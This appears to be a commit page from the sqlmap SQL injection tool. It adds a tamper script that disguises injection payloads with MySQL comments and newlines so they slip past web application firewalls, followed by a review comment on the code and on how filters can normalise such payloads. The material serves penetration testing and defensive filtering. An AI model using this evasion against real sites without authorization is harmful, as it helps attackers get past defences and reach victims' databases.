
Commit 062c156

committed
Added another tamper script from Roberto Salgado
1 parent 93219b9 commit 062c156

2 files changed

Lines changed: 67 additions & 1 deletion


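--- a/tamper/space2morepound.py
+++ b/tamper/space2morepound.py
@@ -0,0 +1,66 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+Copyright (c) 2006-2011 sqlmap developers (http://www.sqlmap.org/)
+See the file 'doc/COPYING' for copying permission
+"""
+
+import os
+import re
+import random
+import string
+
+from lib.core.common import singleTimeWarnMessage
+from lib.core.data import kb
+from lib.core.enums import DBMS
+from lib.core.enums import PRIORITY
+from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
+
+__priority__ = PRIORITY.LOW
+
+def dependencies():
+singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s > 5.1.13" % (os.path.basename(__file__)[:-3], DBMS.MYSQL))
+
+def tamper(payload):
+"""
+Replaces space character (' ') with a pound character ('#') followed by
+a random string and a new line ('\n')
+
+Example:
+* Input: 1 AND 9227=9227
+* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
+
+Requirement:
+* MySQL >= 5.1.13
+
+Tested against:
+* MySQL 5.1.41
+
+Notes:
+* Useful to bypass several web application firewalls
+"""
+
+def process(match):
+word = match.group('word')
+randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12)))
+
+if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
+return match.group().replace(word, "%s%%23%s%%0A" % (word, randomStr))
+else:
+return match.group()
+
+retVal = ""
+
+if payload:
+payload = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), payload)
+
+for i in xrange(len(payload)):
+if payload[i].isspace():
+randomStr = ''.join(random.choice(string.ascii_uppercase + string.lowercase) for x in range(random.randint(6, 12)))
+retVal += "%%23%s%%0A" % randomStr
+else:
+retVal += payload[i]
+
+return retVal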
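Review bot: The warning emitted by `dependencies()` says the script is meant for MySQL `> 5.1.13`, while the `tamper()` docstring in the same file gives the requirement as `MySQL >= 5.1.13`; the two disagree on whether 5.1.13 itself is supported and should be made to match. Both `randomStr` lines combine `string.ascii_uppercase` with `string.lowercase`, which is locale-dependent in Python 2, so `string.ascii_lowercase` would keep the filler plain ASCII under any locale setting. That expression is duplicated in `process()` and in the loop, so a small module-level helper would keep the two in step, and `lambda match: process(match)` can simply be `process`. For anyone reading this from the filtering side, the only thing the transform emits is a `%23<6-12 letters>%0A` sequence in place of whitespace and after keywords, so a filter that strips SQL comments and normalises whitespace before matching should still see the same tokens.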

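--- a/tamper/space2pound.py
+++ b/tamper/space2pound.py
@@ -33,7 +33,7 @@ def tamper(payload):
 * MySQL
 
 Tested against:
-* MySQL 5.0
+* MySQL 4.0, 5.0
 
 Notes:
 * Useful to bypass several web application firewalls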
